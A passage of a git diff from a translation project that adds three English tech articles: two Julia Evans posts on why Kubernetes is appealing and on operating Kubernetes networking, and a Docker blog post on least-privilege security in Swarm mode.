“container”, or any Kubernetes-specific terminology :). I’m going to explain this mostly from the perspective of a kubernetes operator / infrastructure engineer, since my job right now is to set up Kubernetes and make it work well. + +I’m not going to try to address the question of “should you use kubernetes for your production systems?” at all, that is a very complicated question. (not least because “in production” has totally different requirements depending on what you’re doing) + +### Kubernetes lets you run code in production without setting up new servers + +The first pitch I got for Kubernetes was the following conversation with my partner Kamal: + +Here’s an approximate transcript: + +* Kamal: With Kubernetes you can set up a new service with a single command + +* Julia: I don’t understand how that’s possible. + +* Kamal: Like, you just write 1 configuration file, apply it, and then you have a HTTP service running in production + +* Julia: But today I need to create new AWS instances, write a puppet manifest, set up service discovery, configure my load balancers, configure our deployment software, and make sure DNS is working, it takes at least 4 hours if nothing goes wrong. + +* Kamal: Yeah. With Kubernetes you don’t have to do any of that, you can set up a new HTTP service in 5 minutes and it’ll just automatically run. As long as you have spare capacity in your cluster it just works! + +* Julia: There must be a trap + +There kind of is a trap, setting up a production Kubernetes cluster is (in my experience) is definitely not easy. (see [Kubernetes The Hard Way][3] for what’s involved to get started). But we’re not going to go into that right now! + +So the first cool thing about Kubernetes is that it has the potential to make life way easier for developers who want to deploy new software into production. That’s cool, and it’s actually true, once you have a working Kubernetes cluster you really can set up a production HTTP service (“run 5 of this application, set up a load balancer, give it this DNS name, done”) with just one configuration file. It’s really fun to see. + +### Kubernetes gives you easy visibility & control of what code you have running in production + +IMO you can’t understand Kubernetes without understanding etcd. So let’s talk about etcd! + +Imagine that I asked you today “hey, tell me every application you have running in production, what host it’s running on, whether it’s healthy or not, and whether or not it has a DNS name attached to it”. I don’t know about you but I would need to go look in a bunch of different places to answer this question and it would take me quite a while to figure out. I definitely can’t query just one API. + +In Kubernetes, all the state in your cluster – applications running (“pods”), nodes, DNS names, cron jobs, and more – is stored in a single database (etcd). Every Kubernetes component is stateless, and basically works by + +* Reading state from etcd (eg “the list of pods assigned to node 1”) + +* Making changes (eg “actually start running pod A on node 1”) + +* Updating the state in etcd (eg “set the state of pod A to ‘running’”) + +This means that if you want to answer a question like “hey, how many nginx pods do I have running right now in that availabliity zone?” you can answer it by querying a single unified API (the Kubernetes API!). And you have exactly the same access to that API that every other Kubernetes component does. + +This also means that you have easy control of everything running in Kubernetes. If you want to, say, + +* Implement a complicated custom rollout strategy for deployments (deploy 1 thing, wait 2 minutes, deploy 5 more, wait 3.7 minutes, etc) + +* Automatically [start a new webserver][1] every time a branch is pushed to github + +* Monitor all your running applications to make sure all of them have a reasonable cgroups memory limit + +all you need to do is to write a program that talks to the Kubernetes API. (a “controller”) + +Another very exciting thing about the Kubernetes API is that you’re not limited to just functionality that Kubernetes provides! If you decide that you have your own opinions about how your software should be deployed / created / monitored, then you can write code that uses the Kubernetes API to do it! It lets you do everything you need. + +### If every Kubernetes component dies, your code will still keep running + +One thing I was originally promised (by various blog posts :)) about Kubernetes was “hey, if the Kubernetes apiserver and everything else dies, it’s ok, your code will just keep running”. I thought this sounded cool in theory but I wasn’t sure if it was actually true. + +So far it seems to be actually true! + +I’ve been through some etcd outages now, and what happens is + +1. All the code that was running keeps running + +2. Nothing  _new_  happens (you can’t deploy new code or make changes, cron jobs will stop working) + +3. When everything comes back, the cluster will catch up on whatever it missed + +This does mean that if etcd goes down and one of your applications crashes or something, it can’t come back up until etcd returns. + +### Kubernetes’ design is pretty resilient to bugs + +Like any piece of software, Kubernetes has bugs. For example right now in our cluster the controller manager has a memory leak, and the scheduler crashes pretty regularly. Bugs obviously aren’t good but so far I’ve found that Kubernetes’ design helps mitigate a lot of the bugs in its core components really well. + +If you restart any component, what happens is: + +* It reads all its relevant state from etcd + +* It starts doing the necessary things it’s supposed to be doing based on that state (scheduling pods, garbage collecting completed pods, scheduling cronjobs, deploying daemonsets, whatever) + +Because all the components don’t keep any state in memory, you can just restart them at any time and that can help mitigate a variety of bugs. + +For example! Let’s say you have a memory leak in your controller manager. Because the controller manager is stateless, you can just periodically restart it every hour or something and feel confident that you won’t cause any consistency issues. Or we ran into a bug in the scheduler where it would sometimes just forget about pods and never schedule them. You can sort of mitigate this just by restarting the scheduler every 10 minutes. (we didn’t do that, we fixed the bug instead, but you  _could_  :) ) + +So I feel like I can trust Kubernetes’ design to help make sure the state in the cluster is consistent even when there are bugs in its core components. And in general I think the software is generally improving over time. The only stateful thing you have to operate is etcd + +Not to harp on this “state” thing too much but – I think it’s cool that in Kubernetes the only thing you have to come up with backup/restore plans for is etcd (unless you use persistent volumes for your pods). I think it makes kubernetes operations a lot easier to think about. + +### Implementing new distributed systems on top of Kubernetes is relatively easy + +Suppose you want to implement a distributed cron job scheduling system! Doing that from scratch is a ton of work. But implementing a distributed cron job scheduling system inside Kubernetes is much easier! (still not trivial, it’s still a distributed system) + +The first time I read the code for the Kubernetes cronjob controller I was really delighted by how simple it was. Here, go read it! The main logic is like 400 lines of Go. Go ahead, read it! => [cronjob_controller.go][4] <= + +Basically what the cronjob controller does is: + +* Every 10 seconds: + * Lists all the cronjobs that exist + + * Checks if any of them need to run right now + + * If so, creates a new Job object to be scheduled & actually run by other Kubernetes controllers + + * Clean up finished jobs + + * Repeat + +The Kubernetes model is pretty constrained (it has this pattern of resources are defined in etcd, controllers read those resources and update etcd), and I think having this relatively opinionated/constrained model makes it easier to develop your own distributed systems inside the Kubernetes framework. + +Kamal introduced me to this idea of “Kubernetes is a good platform for writing your own distributed systems” instead of just “Kubernetes is a distributed system you can use” and I think it’s really interesting. He has a prototype of a [system to run an HTTP service for every branch you push to github][5]. It took him a weekend and is like 800 lines of Go, which I thought was impressive! + +### Kubernetes lets you do some amazing things (but isn’t easy) + +I started out by saying “kubernetes lets you do these magical things, you can just spin up so much infrastructure with a single configuration file, it’s amazing”. And that’s true! + +What I mean by “Kubernetes isn’t easy” is that Kubernetes has a lot of moving parts learning how to successfully operate a highly available Kubernetes cluster is a lot of work. Like I find that with a lot of the abstractions it gives me, I need to understand what is underneath those abstractions in order to debug issues and configure things properly. I love learning new things so this doesn’t make me angry or anything, I just think it’s important to know :) + +One specific example of “I can’t just rely on the abstractions” that I’ve struggled with is that I needed to learn a LOT [about how networking works on Linux][6] to feel confident with setting up Kubernetes networking, way more than I’d ever had to learn about networking before. This was very fun but pretty time consuming. I might write more about what is hard/interesting about setting up Kubernetes networking at some point. + +Or I wrote a [2000 word blog post][7] about everything I had to learn about Kubernetes’ different options for certificate authorities to be able to set up my Kubernetes CAs successfully. + +I think some of these managed Kubernetes systems like GKE (google’s kubernetes product) may be simpler since they make a lot of decisions for you but I haven’t tried any of them. + +-------------------------------------------------------------------------------- + +via: https://jvns.ca/blog/2017/10/05/reasons-kubernetes-is-cool/ + +作者:[ Julia Evans][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://jvns.ca/about +[1]:https://github.com/kamalmarhubi/kubereview +[2]:https://jvns.ca/categories/kubernetes +[3]:https://github.com/kelseyhightower/kubernetes-the-hard-way +[4]:https://github.com/kubernetes/kubernetes/blob/e4551d50e57c089aab6f67333412d3ca64bc09ae/pkg/controller/cronjob/cronjob_controller.go +[5]:https://github.com/kamalmarhubi/kubereview +[6]:https://jvns.ca/blog/2016/12/22/container-networking/ +[7]:https://jvns.ca/blog/2017/08/05/how-kubernetes-certificates-work/ diff --git a/sources/tech/20171010 Operating a Kubernetes network.md b/sources/tech/20171010 Operating a Kubernetes network.md new file mode 100644 index 0000000000..9c85e9aa70 --- /dev/null +++ b/sources/tech/20171010 Operating a Kubernetes network.md @@ -0,0 +1,216 @@ +Operating a Kubernetes network +============================================================ + +I’ve been working on Kubernetes networking a lot recently. One thing I’ve noticed is, while there’s a reasonable amount written about how to **set up** your Kubernetes network, I haven’t seen much about how to **operate** your network and be confident that it won’t create a lot of production incidents for you down the line. + +In this post I’m going to try to convince you of three things: (all I think pretty reasonable :)) + +* Avoiding networking outages in production is important + +* Operating networking software is hard + +* It’s worth thinking critically about major changes to your networking infrastructure and the impact that will have on your reliability, even if very fancy Googlers say “this is what we do at Google”. (google engineers are doing great work on Kubernetes!! But I think it’s important to still look at the architecture and make sure it makes sense for your organization.) + +I’m definitely not a Kubernetes networking expert by any means, but I have run into a few issues while setting things up and definitely know a LOT more about Kubernetes networking than I used to. + +### Operating networking software is hard + +Here I’m not talking about operating physical networks (I don’t know anything about that), but instead about keeping software like DNS servers & load balancers & proxies working correctly. + +I have been working on a team that’s responsible for a lot of networking infrastructure for a year, and I have learned a few things about operating networking infrastructure! (though I still have a lot to learn obviously). 3 overall thoughts before we start: + +* Networking software often relies very heavily on the Linux kernel. So in addition to configuring the software correctly you also need to make sure that a bunch of different sysctls are set correctly, and a misconfigured sysctl can easily be the difference between “everything is 100% fine” and “everything is on fire”. + +* Networking requirements change over time (for example maybe you’re doing 5x more DNS lookups than you were last year! Maybe your DNS server suddenly started returning TCP DNS responses instead of UDP which is a totally different kernel workload!). This means software that was working fine before can suddenly start having issues. + +* To fix a production networking issues you often need a lot of expertise. (for example see this [great post by Sophie Haskins on debugging a kube-dns issue][1]) I’m a lot better at debugging networking issues than I was, but that’s only after spending a huge amount of time investing in my knowledge of Linux networking. + +I am still far from an expert at networking operations but I think it seems important to: + +1. Very rarely make major changes to the production networking infrastructure (because it’s super disruptive) + +2. When you  _are_  making major changes, think really carefully about what the failure modes are for the new network architecture are + +3. Have multiple people who are able to understand your networking setup + +Switching to Kubernetes is obviously a pretty major networking change! So let’s talk about what some of the things that can go wrong are! + +### Kubernetes networking components + +The Kubernetes networking components we’re going to talk about in this post are: + +* Your overlay network backend (like flannel/calico/weave net/romana) + +* `kube-dns` + +* `kube-proxy` + +* Ingress controllers / load balancers + +* The `kubelet` + +If you’re going to set up HTTP services you probably need all of these. I’m not using most of these components yet but I’m trying to understand them, so that’s what this post is about. + +### The simplest way: Use host networking for all your containers + +Let’s start with the simplest possible thing you can do. This won’t let you run HTTP services in Kubernetes. I think it’s pretty safe because there are less moving parts. + +If you use host networking for all your containers I think all you need to do is: + +1. Configure the kubelet to configure DNS correctly inside your containers + +2. That’s it + +If you use host networking for literally every pod you don’t need kube-dns or kube-proxy. You don’t even need a working overlay network. + +In this setup your pods can connect to the outside world (the same way any process on your hosts would talk to the outside world) but the outside world can’t connect to your pods. + +This isn’t super important (I think most people want to run HTTP services inside Kubernetes and actually communicate with those services) but I do think it’s interesting to realize that at some level all of this networking complexity isn’t strictly required and sometimes you can get away without using it. Avoiding networking complexity seems like a good idea to me if you can. + +### Operating an overlay network + +The first networking component we’re going to talk about is your overlay network. Kubernetes assumes that every pod has an IP address and that you can communicate with services inside that pod by using that IP address. When I say “overlay network” this is what I mean (“the system that lets you refer to a pod by its IP address”). + +All other Kubernetes networking stuff relies on the overlay networking working correctly. You can read more about the [kubernetes networking model here][10]. + +The way Kelsey Hightower describes in [kubernetes the hard way][11] seems pretty good but it’s not really viable on AWS for clusters more than 50 nodes or so, so I’m not going to talk about that. + +There are a lot of overlay network backends (calico, flannel, weaveworks, romana) and the landscape is pretty confusing. But as far as I’m concerned an overlay network has 2 responsibilities: + +1. Make sure your pods can send network requests outside your cluster + +2. Keep a stable mapping of nodes to subnets and keep every node in your cluster updated with that mapping. Do the right thing when nodes are added & removed. + +Okay! So! What can go wrong with your overlay network? + +* The overlay network is responsible for setting up iptables rules (basically `iptables -A -t nat POSTROUTING -s $SUBNET -j MASQUERADE`) to ensure that containers can make network requests outside Kubernetes. If something goes wrong with this rule then your containers can’t connect to the external network. This isn’t that hard (it’s just a few iptables rules) but it is important. I made a [pull request][2] because I wanted to make sure this was resilient + +* Something can go wrong with adding or deleting nodes. We’re using the flannel hostgw backend and at the time we started using it, node deletion [did not work][3]. + +* Your overlay network is probably dependent on a distributed database (etcd). If that database has an incident, this can cause issues. For example [https://github.com/coreos/flannel/issues/610][4] says that if you have data loss in your flannel etcd cluster it can result in containers losing network connectivity. (this has now been fixed) + +* You upgrade Docker and everything breaks + +* Probably more things! + +I’m mostly talking about past issues in Flannel here but I promise I’m not picking on Flannel – I actually really **like** Flannel because I feel like it’s relatively simple (for instance the [vxlan backend part of it][12] is like 500 lines of code) and I feel like it’s possible for me to reason through any issues with it. And it’s obviously continuously improving. They’ve been great about reviewing pull requests. + +My approach to operating an overlay network so far has been: + +* Learn how it works in detail and how to debug it (for example the hostgw network backend for Flannel works by creating routes, so you mostly just need to do `sudo ip route list` to see whether it’s doing the correct thing) + +* Maintain an internal build so it’s easy to patch it if needed + +* When there are issues, contribute patches upstream + +I think it’s actually really useful to go through the list of merged PRs and see bugs that have been fixed in the past – it’s a bit time consuming but is a great way to get a concrete list of kinds of issues other people have run into. + +It’s possible that for other people their overlay networks just work but that hasn’t been my experience and I’ve heard other folks report similar issues. If you have an overlay network setup that is a) on AWS and b) works on a cluster more than 50-100 nodes where you feel more confident about operating it I would like to know. + +### Operating kube-proxy and kube-dns? + +Now that we have some thoughts about operating overlay networks, let’s talk about + +There’s a question mark next to this one because I haven’t done this. Here I have more questions than answers. + +Here’s how Kubernetes services work! A service is a collection of pods, which each have their own IP address (like 10.1.0.3, 10.2.3.5, 10.3.5.6) + +1. Every Kubernetes service gets an IP address (like 10.23.1.2) + +2. `kube-dns` resolves Kubernetes service DNS names to IP addresses (so my-svc.my-namespace.svc.cluster.local might map to 10.23.1.2) + +3. `kube-proxy` sets up iptables rules in order to do random load balancing between them. Kube-proxy also has a userspace round-robin load balancer but my impression is that they don’t recommend using it. + +So when you make a request to `my-svc.my-namespace.svc.cluster.local`, it resolves to 10.23.1.2, and then iptables rules on your local host (generated by kube-proxy) redirect it to one of 10.1.0.3 or 10.2.3.5 or 10.3.5.6 at random. + +Some things that I can imagine going wrong with this: + +* `kube-dns` is misconfigured + +* `kube-proxy` dies and your iptables rules don’t get updated + +* Some issue related to maintaining a large number of iptables rules + +Let’s talk about the iptables rules a bit, since doing load balancing by creating a bajillion iptables rules is something I had never heard of before! + +kube-proxy creates one iptables rule per target host like this: (these rules are from [this github issue][13]) + +``` +-A KUBE-SVC-LI77LBOOMGYET5US -m comment --comment "default/showreadiness:showreadiness" -m statistic --mode random --probability 0.20000000019 -j KUBE-SEP-E4QKA7SLJRFZZ2DD[b][c] +-A KUBE-SVC-LI77LBOOMGYET5US -m comment --comment "default/showreadiness:showreadiness" -m statistic --mode random --probability 0.25000000000 -j KUBE-SEP-LZ7EGMG4DRXMY26H +-A KUBE-SVC-LI77LBOOMGYET5US -m comment --comment "default/showreadiness:showreadiness" -m statistic --mode random --probability 0.33332999982 -j KUBE-SEP-RKIFTWKKG3OHTTMI +-A KUBE-SVC-LI77LBOOMGYET5US -m comment --comment "default/showreadiness:showreadiness" -m statistic --mode random --probability 0.50000000000 -j KUBE-SEP-CGDKBCNM24SZWCMS +-A KUBE-SVC-LI77LBOOMGYET5US -m comment --comment "default/showreadiness:showreadiness" -j KUBE-SEP-RI4SRNQQXWSTGE2Y + +``` + +So kube-proxy creates a **lot** of iptables rules. What does that mean? What are the implications of that in for my network? There’s a great talk from Huawei called [Scale Kubernetes to Support 50,000 services][14] that says if you have 5,000 services in your kubernetes cluster, it takes **11 minutes** to add a new rule. If that happened to your real cluster I think it would be very bad. + +I definitely don’t have 5,000 services in my cluster, but 5,000 isn’t SUCH a bit number. The proposal they give to solve this problem is to replace this iptables backend for kube-proxy with IPVS which is a load balancer that lives in the Linux kernel. + +It seems like kube-proxy is going in the direction of various Linux kernel based load balancers. I think this is partly because they support UDP load balancing, and other load balancers (like HAProxy) don’t support UDP load balancing. + +But I feel comfortable with HAProxy! Is it possible to replace kube-proxy with HAProxy! I googled this and I found this [thread on kubernetes-sig-network][15] saying: + +> kube-proxy is so awesome, we have used in production for almost a year, it works well most of time, but as we have more and more services in our cluster, we found it was getting hard to debug and maintain. There is no iptables expert in our team, we do have HAProxy&LVS experts, as we have used these for several years, so we decided to replace this distributed proxy with a centralized HAProxy. I think this maybe useful for some other people who are considering using HAProxy with kubernetes, so we just update this project and make it open source: [https://github.com/AdoHe/kube2haproxy][5]. If you found it’s useful , please take a look and give a try. + +So that’s an interesting option! I definitely don’t have answers here, but, some thoughts: + +* Load balancers are complicated + +* DNS is also complicated + +* If you already have a lot of experience operating one kind of load balancer (like HAProxy), it might make sense to do some extra work to use that instead of starting to use an entirely new kind of load balancer (like kube-proxy) + +* I’ve been thinking about where we want to be using kube-proxy or kube-dns at all – I think instead it might be better to just invest in Envoy and rely entirely on Envoy for all load balancing & service discovery. So then you just need to be good at operating Envoy. + +As you can see my thoughts on how to operate your Kubernetes internal proxies are still pretty confused and I’m still not super experienced with them. It’s totally possible that kube-proxy and kube-dns are fine and that they will just work fine but I still find it helpful to think through what some of the implications of using them are (for example “you can’t have 5,000 Kubernetes services”). + +### Ingress + +If you’re running a Kubernetes cluster, it’s pretty likely that you actually need HTTP requests to get into your cluster so far. This blog post is already too long and I don’t know much about ingress yet so we’re not going to talk about that. + +### Useful links + +A couple of useful links, to summarize: + +* [The Kubernetes networking model][6] + +* How GKE networking works: [https://www.youtube.com/watch?v=y2bhV81MfKQ][7] + +* The aforementioned talk on `kube-proxy` performance: [https://www.youtube.com/watch?v=4-pawkiazEg][8] + +### I think networking operations is important + +My sense of all this Kubernetes networking software is that it’s all still quite new and I’m not sure we (as a community) really know how to operate all of it well. This makes me worried as an operator because I really want my network to keep working! :) Also I feel like as an organization running your own Kubernetes cluster you need to make a pretty large investment into making sure you understand all the pieces so that you can fix things when they break. Which isn’t a bad thing, it’s just a thing. + +My plan right now is just to keep learning about how things work and reduce the number of moving parts I need to worry about as much as possible. + +As usual I hope this was helpful and I would very much like to know what I got wrong in this post! + +-------------------------------------------------------------------------------- + +via: https://jvns.ca/blog/2017/10/10/operating-a-kubernetes-network/ + +作者:[Julia Evans ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://jvns.ca/about +[1]:http://blog.sophaskins.net/blog/misadventures-with-kube-dns/ +[2]:https://github.com/coreos/flannel/pull/808 +[3]:https://github.com/coreos/flannel/pull/803 +[4]:https://github.com/coreos/flannel/issues/610 +[5]:https://github.com/AdoHe/kube2haproxy +[6]:https://kubernetes.io/docs/concepts/cluster-administration/networking/#kubernetes-model +[7]:https://www.youtube.com/watch?v=y2bhV81MfKQ +[8]:https://www.youtube.com/watch?v=4-pawkiazEg +[9]:https://jvns.ca/categories/kubernetes +[10]:https://kubernetes.io/docs/concepts/cluster-administration/networking/#kubernetes-model +[11]:https://github.com/kelseyhightower/kubernetes-the-hard-way/blob/master/docs/11-pod-network-routes.md +[12]:https://github.com/coreos/flannel/tree/master/backend/vxlan +[13]:https://github.com/kubernetes/kubernetes/issues/37932 +[14]:https://www.youtube.com/watch?v=4-pawkiazEg +[15]:https://groups.google.com/forum/#!topic/kubernetes-sig-network/3NlBVbTUUU0 diff --git a/sources/tech/20171011 LEAST PRIVILEGE CONTAINER ORCHESTRATION.md b/sources/tech/20171011 LEAST PRIVILEGE CONTAINER ORCHESTRATION.md new file mode 100644 index 0000000000..7a9b6e817c --- /dev/null +++ b/sources/tech/20171011 LEAST PRIVILEGE CONTAINER ORCHESTRATION.md @@ -0,0 +1,174 @@ +# LEAST PRIVILEGE CONTAINER ORCHESTRATION + + +The Docker platform and the container has become the standard for packaging, deploying, and managing applications. In order to coordinate running containers across multiple nodes in a cluster, a key capability is required: a container orchestrator. + +![container orchestrator](https://i0.wp.com/blog.docker.com/wp-content/uploads/f753d4e8-9e22-4fe2-be9a-80661ef696a8-3.jpg?resize=536%2C312&ssl=1) + +Orchestrators are responsible for critical clustering and scheduling tasks, such as: + +* Managing container scheduling and resource allocation. + +* Support service discovery and hitless application deploys. + +* Distribute the necessary resources that applications need to run. + +Unfortunately, the distributed nature of orchestrators and the ephemeral nature of resources in this environment makes securing orchestrators a challenging task. In this post, we will describe in detail the less-considered—yet vital—aspect of the security model of container orchestrators, and how Docker Enterprise Edition with its built-in orchestration capability, Swarm mode, overcomes these difficulties. + +Motivation and threat model +============================================================ + +One of the primary objectives of Docker EE with swarm mode is to provide an orchestrator with security built-in. To achieve this goal, we developed the first container orchestrator designed with the principle of least privilege in mind. + +In computer science,the principle of least privilege in a distributed system requires that each participant of the system must only have access to  the information and resources that are necessary for its legitimate purpose. No more, no less. + +> #### ”A process must be able to access only the information and resources that are necessary for its legitimate purpose.” + +#### Principle of Least Privilege + +Each node in a Docker EE swarm is assigned role: either manager or worker. These roles define a coarsegrained level of privilege to the nodes: administration and task execution, respectively. However, regardless of its role, a node has access only to the information and resources it needs to perform the necessary tasks, with cryptographically enforced guarantees. As a result, it becomes easier to secure clusters against even the most sophisticated attacker models: attackers that control the underlying communication networks or even compromised cluster nodes. + +# Secure-by-default core + +There is an old security maxim that states: if it doesn’t come by default, no one will use it. Docker Swarm mode takes this notion to heart, and ships with secure-by-default mechanisms to solve three of the hardest and most important aspects of the orchestration lifecycle: + +1. Trust bootstrap and node introduction. + +2. Node identity issuance and management. + +3. Authenticated, Authorized, Encrypted information storage and dissemination. + +Let’s look at each of these aspects individually + +### Trust Bootstrap and Node Introduction + +The first step to a secure cluster is tight control over membership and identity. Without it, administrators cannot rely on the identities of their nodes and enforce strict workload separation between nodes. This means that unauthorized nodes can’t be allowed to join the cluster, and nodes that are already part of the cluster aren’t able to change identities, suddenly pretending to be another node. + +To address this need, nodes managed by Docker EE’s Swarm mode maintain strong, immutable identities. The desired properties are cryptographically guaranteed by using two key building-blocks: + +1. Secure join tokens for cluster membership. + +2. Unique identities embedded in certificates issued from a central certificate authority. + +### Joining the Swarm + +To join the swarm, a node needs a copy of a secure join token. The token is unique to each operational role within the cluster—there are currently two types of nodes: workers and managers. Due to this separation, a node with a copy of a worker token will not be allowed to join the cluster as a manager. The only way to get this special token is for a cluster administrator to interactively request it from the cluster’s manager through the swarm administration API. + +The token is securely and randomly generated, but it also has a special syntax that makes leaks of this token easier to detect: a special prefix that you can easily monitor for in your logs and repositories. Fortunately, even if a leak does occur, tokens are easy to rotate, and we recommend that you rotate them often—particularly in the case where your cluster will not be scaling up for a while. + +![Docker Swarm](https://i1.wp.com/blog.docker.com/wp-content/uploads/92d171d4-52c7-4702-8143-110c6f52017c-2.jpg?resize=547%2C208&ssl=1) + +### Bootstrapping trust + +As part of establishing its identity, a new node will ask for a new identity to be issued by any of the network managers. However, under our threat model, all communications can be intercepted by a third-party. This begs the question: how does a node know that it is talking to a legitimate manager? + +![Docker Security](https://i0.wp.com/blog.docker.com/wp-content/uploads/94e3fef0-5bd2-4970-b9e9-25b566d926ad-2.jpg?resize=528%2C348&ssl=1) + +Fortunately, Docker has a built-in mechanism for preventing this from happening. The join token, which the host uses to join the swarm, includes a hash of the root CA’s certificate. The host can therefore use one-way TLS and use the hash to verify that it’s joining the right swarm: if the manager presents a certificate not signed by a CA that matches the hash, the node knows not to trust it. + +### Node identity issuance and management + +Identities in a swarm are embedded in x509 certificates held by each individual node. In a manifestation of the least privilege principle, the certificates’ private keys are restricted strictly to the hosts where they originate. In particular, managers do not have access to private keys of any certificate but their own. + +### Identity Issuance + +To receive their certificates without sharing their private keys, new hosts begin by issuing a certificate signing request (CSR), which the managers then convert into a certificate. This certificate now becomes the new host’s identity, making the node a full-fledged member of the swarm! + +#### +![](https://i0.wp.com/blog.docker.com/wp-content/uploads/415ae6cf-7e76-4ba8-9d84-6d49bf327d8f-2.jpg?resize=548%2C350&ssl=1) + +When used alongside with the secure bootstrapping mechanism, this mechanism for issuing identities to joining nodes is secure by default: all communicating parties are authenticated, authorized and no sensitive information is ever exchanged in clear-text. + +### Identity Renewal + +However, securely joining nodes to a swarm is only part of the story. To minimize the impact of leaked or stolen certificates and to remove the complexity of managing CRL lists, Swarm mode uses short-lived certificates for the identities. These certificates have a default expiration of three months, but can be configured to expire every hour! + +![Docker secrets](https://i0.wp.com/blog.docker.com/wp-content/uploads/55e2ab9a-19cd-465d-82c6-fa76110e7ecd-2.jpg?resize=556%2C365&ssl=1) + +This short certificate expiration time means that certificate rotation can’t be a manual process, as it usually is for most PKI systems. With swarm, all certificates are rotated automatically and in a hitless fashion. The process is simple: using a mutually authenticated TLS connection to prove ownership over a particular identity, a Swarm node generates regularly a new public/private key pair and sends the corresponding CSR to be signed, creating a completely new certificate, but maintaining the same identity. + +### Authenticated, Authorized, Encrypted information storage and dissemination. + +During the normal operation of a swarm, information about the tasks has to be sent to the worker nodes for execution. This includes not only information on which containers are to be executed by a node;but also, it includes  all the resources that are necessary for the successful execution of that container, including sensitive secrets such as private keys, passwords, and API tokens. + +### Transport Security + +The fact that every node participating in a swarm is in possession of a unique identity in the form of a X509 certificate, communicating securely between nodes is trivial: nodes can use their respective certificates to establish mutually authenticated connections between one another, inheriting the confidentiality, authenticity and integrity properties of TLS. + +![Swarm Mode](https://i0.wp.com/blog.docker.com/wp-content/uploads/972273a3-d9e5-4053-8fcb-a407c8cdcbf6-2.jpg?resize=347%2C271&ssl=1) + +One interesting detail about Swarm mode is the fact that it uses a push model: only managers are allowed to send information to workers—significantly reducing the surface of attack manager nodes expose to the less privileged worker nodes. + +### Strict Workload Separation Into Security Zones + +One of the responsibilities of manager nodes is deciding which tasks to send to each of the workers. Managers make this determination using a variety of strategies; scheduling the workloads across the swarm depending on both the unique properties of each node and each workload. + +In Docker EE with Swarm mode, administrators have the ability of influencing these scheduling decisions by using labels that are securely attached to the individual node identities. These labels allow administrators to group nodes together into different security zones limiting the exposure of particularly sensitive workloads and any secrets related to them. + +![Docker Swarm Security](https://i0.wp.com/blog.docker.com/wp-content/uploads/67ffa551-d4ae-4522-ba13-4a646a158592-2.jpg?resize=546%2C375&ssl=1) + +### Secure Secret Distribution + +In addition to facilitating the identity issuance process, manager nodes have the important task of storing and distributing any resources needed by a worker. Secrets are treated like any other type of resource, and are pushed down from the manager to the worker over the secure mTLS connection. + +![Docker Secrets](https://i1.wp.com/blog.docker.com/wp-content/uploads/4341da98-2f8c-4aed-bb40-607246344dd8-2.jpg?resize=508%2C326&ssl=1) + +On the hosts, Docker EE ensures that secrets are provided only to the containers they are destined for. Other containers on the same host will not have access to them. Docker exposes secrets to a container as a temporary file system, ensuring that secrets are always stored in memory and never written to disk. This method is more secure than competing alternatives, such as [storing them in environment variables][12]. Once a task completes the secret is gone forever. + +### Storing secrets + +On manager hosts secrets are always encrypted at rest. By default, the key that encrypts these secrets (known as the Data Encryption Key, DEK) is also stored in plaintext on disk. This makes it easy for those with minimal security requirements to start using Docker Swarm mode. + +However, once you are running a production cluster, we recommend you enable auto-lock mode. When auto-lock mode is enabled, a newly rotated DEK is encrypted with a separate Key Encryption Key (KEK). This key is never stored on the cluster; the administrator is responsible for storing it securely and providing it when the cluster starts up. This is known as unlocking the swarm. + +Swarm mode supports multiple managers, relying on the Raft Consensus Algorithm for fault tolerance. Secure secret storage scales seamlessly in this scenario. Each manager host has a unique disk encryption key, in addition to the shared key. Furthermore, Raft logs are encrypted on disk and are similarly unavailable without the KEK when in autolock mode. + +### What happens when a node is compromised? + +![Docker Secrets](https://i0.wp.com/blog.docker.com/wp-content/uploads/2a78b37d-bbf0-40ee-a282-eb0900f71ba9-2.jpg?resize=502%2C303&ssl=1) + +In traditional orchestrators, recovering from a compromised host is a slow and complicated process. With Swarm mode, recovery is as easy as running the docker node rm command. This removes the affected node from the cluster, and Docker will take care of the rest, namely re-balancing services and making sure other hosts know not to talk to the affected node. + +As we have seen, thanks to least privilege orchestration, even if the attacker were still active on the host, they would be cut off from the rest of the network. The host’s certificate — its identity — is blacklisted, so the managers will not accept it as valid. + +# Conclusion + +Docker EE with Swarm mode ensures security by default in all key areas of orchestration: + +* Joining the cluster. Prevents malicious nodes from joining the cluster. + +* Organizing hosts into security zones. Prevents lateral movement by attackers. + +* Scheduling tasks. Tasks will be issued only to designated and allowed nodes. + +* Allocating resources. A malicious node cannot “steal” another’s workload or resources. + +* Storing secrets. Never stored in plaintext and never written to disk on worker nodes. + +* Communicating with the workers. Encrypted using mutually authenticated TLS. + +As Swarm mode continues to improve, the Docker team is working to take the principle of least privilege orchestration even further. The task we are tackling is: how can systems remain secure if a manager is compromised? The roadmap is in place, with some of the features already available such as the ability of whitelisting only specific Docker images, preventing managers from executing arbitrary workloads. This is achieved quite naturally using Docker Content Trust. + +-------------------------------------------------------------------------------- + +via: https://blog.docker.com/2017/10/least-privilege-container-orchestration/ + +作者:[Diogo Mónica ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://blog.docker.com/author/diogo/ +[1]:http://www.linkedin.com/shareArticle?mini=true&url=http://dockr.ly/2yZoNdy&title=Least%20Privilege%20Container%20Orchestration&summary=The%20Docker%20platform%20and%20the%20container%20has%20become%20the%20standard%20for%20packaging,%20deploying,%20and%20managing%20applications.%20In%20order%20to%20coordinate%20running%20containers%20across%20multiple%20nodes%20in%20a%20cluster,%20a%20key%20capability%20is%20required:%20a%20container%20orchestrator.Orchestrators%20are%20responsible%20for%20critical%20clustering%20and%20scheduling%20tasks,%20such%20as:%20%20%20%20Managing%20... +[2]:http://www.reddit.com/submit?url=http://dockr.ly/2yZoNdy&title=Least%20Privilege%20Container%20Orchestration +[3]:https://plus.google.com/share?url=http://dockr.ly/2yZoNdy +[4]:http://news.ycombinator.com/submitlink?u=http://dockr.ly/2yZoNdy&t=Least%20Privilege%20Container%20Orchestration +[5]:https://blog.docker.com/author/diogo/ 